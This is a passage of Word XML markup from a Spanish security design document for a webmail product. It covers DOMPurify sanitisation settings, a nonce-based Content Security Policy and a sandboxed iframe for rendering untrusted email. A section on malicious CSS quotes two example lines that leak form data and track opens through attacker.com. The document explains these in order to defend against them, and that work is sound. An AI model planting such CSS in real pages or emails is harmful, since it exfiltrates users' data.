          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'center'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOWED_ATTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'href'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'title'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'alt'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'src'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'width'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'height'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'style'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'colspan'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'rowspan'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'align'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'valign'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'bgcolor'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'color'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'face'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'size'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  ]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOW_DATA_ATTR</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SANITIZE_DOM</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mmentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Permitir solo URLs http/https/mailto/cid en enlaces e imágenes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ALLOWED_URI_REGEXP</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ht</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">mailto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">callto</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">blob</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">chrome</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">x-moz-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ms-appx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ms-appx-web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">|\/\/|\/|[^a-z]|[a-z+.\-]+(?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[^a-z+.\-:]|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">/i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Eliminar todo contenido de &lt;script&gt; y &lt;style&gt; antes del parsing</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">KEEP_CONTENT</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clean </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> DOMPurify</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sanitize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(untrustedHtml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> EMAIL_CONFIG)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DOMPurify elimina elementos como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;object&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;embed&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;form&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, y event handlers inline (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onclick</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onerror</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">onbegin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en SVG). Sin embargo, CVE-2025-15599 demostró que incluso DOMPurify puede tener bypasses, lo que justifica las capas adicionales</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[53]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Capa 2 — Content Security Policy estricta con nonces.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">La respuesta HTTP que entrega el contenido del email incluye headers CSP que previenen la ejecución de scripts incluso si un atacante logra inyectar JavaScript que DOMPurify no detectó:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Content-Security-Policy: default-src 'none'; script-src 'nonce-{random}' 'strict-dynamic'; style-src 'nonce-{random}' 'unsafe-inline'; img-src 'self' cid: data: https:; font-src 'none'; object-src 'none'; base-uri 'none'; frame-ancestors 'self'; form-action 'none'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">El nonce es un valor criptográficamente aleatorio de 128 bits generado por el backend para cada respuesta, inyectado en las etiquetas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;style&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">legítimas del email renderizado. Un atacante no puede predecir el nonce, por lo que cualquier</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inyectado no cumple la directiva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">script-src</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y el navegador lo bloquea</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[109]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[115]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La directiva</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">strict-dynamic</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">permite que scripts confiados (los que tienen el nonce) carguen otros scripts dinámicamente sin restricciones adicionales, simplificando la gestión de dependencias.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Capa 3 — Sandboxed iframe.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">El contenido HTML del correo se renderiza dentro de un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;iframe sandbox="allow-same-origin"&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con atributo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">srcdoc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. El atributo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sandbox</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">desactiva por defecto: scripts, formularios, popups, modales, el API de permisos y el acceso al storage del parent. Incluso si el CSP fallara y DOMPurify dejara pasar un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;script&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, el sandbox del iframe previene la ejecución en el contexto de la aplicación principal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[79]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[113]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="133"/>
    <w:bookmarkStart w:id="134" w:name="css-malicioso-juice-whitelist-css"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">9.1.2 CSS malicioso: Juice + whitelist CSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Los estilos CSS pueden servir como canal de exfiltración de datos. Un atacante puede usar selectores como</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">input[value^="a"] { background: url(https://attacker.com/leak?a) }</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para extraer carácter por carácter el valor de campos de formulario, o</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">@import url("https://attacker.com/tracker.css")</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para registrar la apertura de un correo desde una IP específica.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Webmail 6.0 utiliza</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Juice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">para inlinear CSS antes de la sanitización. Juice convierte reglas CSS en atributos</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">style</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">inline, que luego son filtradas por DOMPurify. Posteriormente, un segundo paso de filtrado elimina propiedades CSS potencialmente peligrosas:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ALLOWED_CSS_PROPS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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'color'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'background-color'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'font-family'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
